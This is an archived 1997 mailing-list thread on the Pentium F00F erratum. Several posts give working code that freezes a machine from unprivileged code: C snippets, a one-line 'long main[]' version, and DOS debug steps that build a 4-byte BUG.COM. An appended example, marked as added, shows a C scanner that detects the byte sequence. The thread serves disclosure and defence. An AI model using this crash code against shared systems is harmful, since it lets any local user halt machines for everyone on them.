Pentium bug halts system
Jeremiah Gowdy
coldfusion1@geocities.com
Fri Nov 14 13:05:00 GMT 1997
Greetings to all parties interested in the Pentium Bug.

First I'd like to say, in regards to the best way to code this bug (Chris from Qualcomm), I've attached the best way to code it: a 4 byte file containing the 4 byte instruction, with the .COM extension. I do not know the equivalent way to directly send instructions to the CPU in Linux/Unix/etc.

Also, Intel has released the fact that they have a "backdoor" way of accessing/reprogramming/patching the processor that they can access to issue a software patch, so if you think they're going to give you a new processor, think again.

For those who do not know what the pentium bug is, first you must understand that the processor usually catches all invalid commands that are issued and calls an Exception 6 or INT 6. This interrupt vector can be captured by the Windows OS or any other DOS program that handles these kinds of errors (i.e. QEMM). However, the instruction F0 0F C7 C8 (god knows why) is NOT trapped by the processor. If an error is not trapped before it gets to the Execution Unit, the results of what may happen are undefined. In most cases the computer will "crash" either by the processor putting itself into the double fault state (?) or the halt state (?) or just totally doing random undefined weird things. My processor knowledge is limited for all processors above 80386SX except for the K5 and the K6, so I'm not sure if the states are valid any more (I know HLT still works though). In any case, because this instruction is not valid it does not belong to any of the rings of protection levels around the CPU and therefore even the lowest application program can execute the instruction.

As for the question

> I don't know if it only affects pentium chips or ppro and pII as well.

No it does not. Those chips are based on a totally different design (8086 to RISC) than the original pentium processor. Also because of the fact that it was based on (somewhat) but not directly copied from the pentium (there are many differences), the AMD K5 is not affected by the bug (of course), and neither is the K6 (RISC86).

To return to one of the biggest questions, "How do I implement the bug?". I'm sure you only want to know for testing purposes. :)

    char code [5] = { 0xf0, 0x0f, 0xc7, 0xc8 };
    void main(void)
    {
        void (*bug)() = code;
        bug();
    }

Is one of the ways I thought of doing it, and I noticed it's the same as one included below. However this method will work just as well, and it never occurred to me to try this....

    long main[] = { 0xc8c70ff0 };

Much easier. However if you are in DOS you can use DOS's debug. Type the following at a DOS prompt to activate the bug. Starting at something like

    C:\>

type this

    debug
    E 100 F0 0F C7 C8
    G

That should execute the bug code. If you want to save it to a COM file do this

    debug
    E 100 F0 0F C7 C8
    R CX
    4
    N BUG.COM
    W
    Q

Now you have a COM file named BUG.COM which when executed will activate the bug (size 4 bytes).

Having little experience with network security, I do not know how this can be effectively used to attack a computer. BUT, before people start to freak out, this CANNOT be used to crash people in HTTP (world wide web protocol) FTP EMAIL/SMTP/POP3 IRC or anything else I can think of except a protocol which can automatically copy a file onto your hard drive and then execute it. If there is such a protocol, people would be using it to send you a real honest to god Virus, instead of some little bug that just crashes your computer and requires you to reboot. If anyone receiving this knows of such a method or has any other questions, corrections, or comments mail me at coldfusion1@geocities.com. Also for any computer programmers or computer science students this may be reaching, please check out this page www.geocities.com/SiliconValley/Lakes/9367/.

Please continue to send this message out to the people on your mailing lists but also help fight lame and fake chain messages from being passed on through the net by refusing to forward them to your friends. Stop The Spam.

Bryan Talbot wrote:

> Hmm, this is not good.  There is a recently discovered Pentium bug that
> "halts" the entire machine and any user can perform the instruction.
> Normally, if an illegal or privileged instruction is performed, the CPU
> traps and lets the OS take control.  For some reason though, there
> appears to be an undocumented opcode that doesn't trap and essentially
> performs a cpu halt.
>
> I can hear machines all over the country coming to a screeching halt
> already ...
>
> I wonder how Intel is going to handle this one!
>
> Bryan
> --
> =====================================================================
> NOTE: The most fundamental particles in this message are held
> together by a "Gluing" force about which little is currently known
> and whose adhesive power can therefore not be permanently guaranteed.
> =====================================================================
>          "I think not!" said Descartes, who promptly disappeared.
>
> ------------------------------------------------------------------------
>
> Hiya'll,  I just received this note on the linux-smp list and I tried
> it as well.  Sure does lock up a machine fast.  I ran the program as a
> normal user.  I only tried it on Linux though.  You're welcome to try it
> on another OS.  It affects all OSes running on the Intel Pentium chips.
> Bummer....
>
> I don't know if it only affects pentium chips or ppro and pII as well.
> Anyone know?
> --
> Marc C.
>
> ---------------Message--------------------------------------
>
> Today I received the following from the linux-security list.  I was
> wondering if any of the kernel hackers here had anything to comment.
> Especially concerning any possibility that the kernel could detect this
> before the program gets executed.
>   Thanks in advance,
>    -M@
>
> This morning I received this message from the list gnu-win32@cygnus.com:
> The sender was anonymous
>
> > There is a SERIOUS bug in all pentium CPUs. The following
> > code will crash any machine running on a pentium CPU, MMX or no
> > MMX, any speed, regardless of OS (crash as in instant seize, hard
> > reboot the only cure):
> >
> > char x [5] = { 0xf0, 0x0f, 0xc7, 0xc8 };
> >
> > main ()
> > {
> >        void (*f)() = x;
> >        f();
> > }
> >
> > This requires no special permissions to run, it works fine with
> > average-joe-userspace permissions. I have verified this, it works.
> > Demand a new CPU from Intel.
>
> Curious, I compiled that under Linux OS. Linux froze. Dead.
> Without *any* warning.
>
> My machine is a Genuine Intel 166 MHZ Pentium MMX.
>
> Then I rebooted Windows NT. Compiled it with my compiler system
> (lcc-win32).  Windows NT froze. DEAD. Without *any* warning.
>
> Then, I ported the code to my old faithful 486-DX33 with linux. Compiled
> it.  When it runs it traps with 'illegal instruction'
>
> This means that anybody can crash anytime any OS that runs under a
> Pentium CPU.  As the poster said, no special permissions are needed, the
> pentium runs under ring 3 permissions!!!!
>
> This means that no secure system can ever be built that uses the pentium
> CPU. No protected system. The OS receives NO TRAP!!!
>
> This is absolutely incredible.
>
> Bugs are impossible to avoid. Not even with huge corporations like
> Intel. I will *not* start screaming at Intel now. Myself, I have done
> more bugs than Intel ever will. As someone said before:
>
> Those that are free of sin, throw the first stone...
>
> For any user of pentium cpus in a multiuser system this means that
> anybody that can execute a program can freeze the system dead. I repeat:
> NO ROOT PERMISSIONS ARE NEEDED.
> --
> Jacob Navia    Logiciels/Informatique
> 41 rue Maurice Ravel                   Tel (1) 48.23.51.44
> 93430 Villetaneuse                     Fax (1) 48.23.95.39
> France
>
> --
> ----------------------------------------------------------------------
> Please refer to the information about this list as well as general
> information about Linux security at http://www.aoy.com/Linux/Security .
> ----------------------------------------------------------------------
>
> Hi,
> on my PPRO 200 the prog only gives Illegal Instruction.
> I compiled the following under Linux 2.0:
>
> char x [5] = {0xf0, 0x0f, 0xc7, 0xc8};
>
> int main ()
> {
>  void (*f)() = (void (*)())x;
>  f();
> }
>
> Bye,
> Martin.
>
> > There is a SERIOUS bug in all pentium CPUs. The following
> > code will crash any machine running on a pentium CPU, MMX or no
> > MMX, any speed, regardless of OS (crash as in instant seize, hard
> > reboot the only cure):
> >
> > char x [5] = { 0xf0, 0x0f, 0xc7, 0xc8 };
> >
> > main ()
> > {
> >        void (*f)() = x;
> >        f();
> > }
>
> Martin Kahlert (martin.kahlert@keksy.mchp.siemens.de) wrote:
> : Hi,
> : on my PPRO 200 the prog only gives Illegal Instruction.
> : I compiled the following under Linux 2.0:
>
> : char x [5] = {0xf0, 0x0f, 0xc7, 0xc8};
> :
> : int main ()
> : {
> :  void (*f)() = (void (*)())x;
> :  f();
> : }
>
> I've heard that the above code doesn't work on some P5's either.  The
> following does:
>
> long main[] = { 0xc8c70ff0 };
>
> Let's see who can come up with the most elegant C code for doing this?
>
> --
> -- mark heath - Unix System Programmer/Engineer - Netspace Online Systems.
> -- http://www.netspace.net.au/          [Personal /~mheath]
> :wq
>
>                                     Regards,
>                                         Christopher
>
> ------------------------------------------------------------------------------
> | This space for rent!
> ------------------------------------------------------------------------------
> | Christopher R. Wingert               Senior Software Engineer
> | cwingert@qualcomm.com                Phone (619) 658-4428
> | http://www.qualcomm.com/~cwingert    Fax (619) 658-2113
> ------------------------------------------------------------------------------
> | They say the empty can rattles the most, the sound of your own voice must
> | soothe you                                              --James Hetfield
> ------------------------------------------------------------------------------

BUG.COM
-------------- next part --------------
A non-text attachment was scrubbed...
Name: BUG.COM
Type: application/octet-stream
Size: 4 bytes
Desc: not available
URL: <http://cygwin.com/pipermail/cygwin/attachments/19971114/1731bc7d/attachment.obj>
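
Added example, not part of the original message or of any code posted in the thread: one of the quoted messages asks whether the sequence could be detected before a program is executed, and a static byte scan over a file image is the simplest form of that check. The function names and the sample buffer are assumptions made for this illustration; the check covers every register form of the opcode (ModRM bytes C8 through CF), which goes beyond the single four-byte sequence quoted above.

```c
#include <stddef.h>
#include <stdio.h>

/* Nonzero if p[0..3] encodes LOCK CMPXCHG8B with a register operand:
 * F0 0F C7 /1 with ModRM.mod == 11b, i.e. ModRM bytes C8..CF. */
static int is_f00f(const unsigned char *p)
{
    return p[0] == 0xF0 && p[1] == 0x0F && p[2] == 0xC7 &&
           (p[3] & 0xC0) == 0xC0 &&   /* mod = 11: register, not memory */
           ((p[3] >> 3) & 7) == 1;    /* reg = /1: CMPXCHG8B */
}

/* Scan buf, record up to max match offsets in hits, return total matches. */
size_t scan_f00f(const unsigned char *buf, size_t len,
                 size_t *hits, size_t max)
{
    size_t n = 0;
    for (size_t i = 0; i + 4 <= len; i++) {
        if (is_f00f(buf + i)) {
            if (n < max)
                hits[n] = i;
            n++;
        }
    }
    return n;
}

/* Constructed sample image, not taken from any real binary. */
static const unsigned char sample[] = {
    0x90, 0x90,             /* nop; nop */
    0xF0, 0x0F, 0xC7, 0x0F, /* lock cmpxchg8b [edi]: valid memory form */
    0x0F, 0xC7, 0xC8,       /* same opcode without the LOCK prefix */
    0xF0, 0x0F, 0xC7, 0xC8, /* the four bytes quoted in this thread */
    0xC3                    /* ret */
};

int main(void)
{
    size_t hits[8];
    size_t n = scan_f00f(sample, sizeof sample, hits, 8);

    for (size_t i = 0; i < n && i < 8; i++)
        printf("F0 0F C7 /1 register form at offset 0x%zx\n", hits[i]);
    printf("%zu match(es)\n", n);
    return n ? 1 : 0;
}
```

A match only shows that the bytes are present in the file, so data that happens to contain them is flagged too, and code assembled at run time is not seen by a scan like this.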